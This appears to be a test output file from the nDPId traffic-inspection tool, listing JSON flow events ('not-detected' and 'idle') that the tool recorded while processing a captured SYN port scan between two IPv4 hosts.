+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 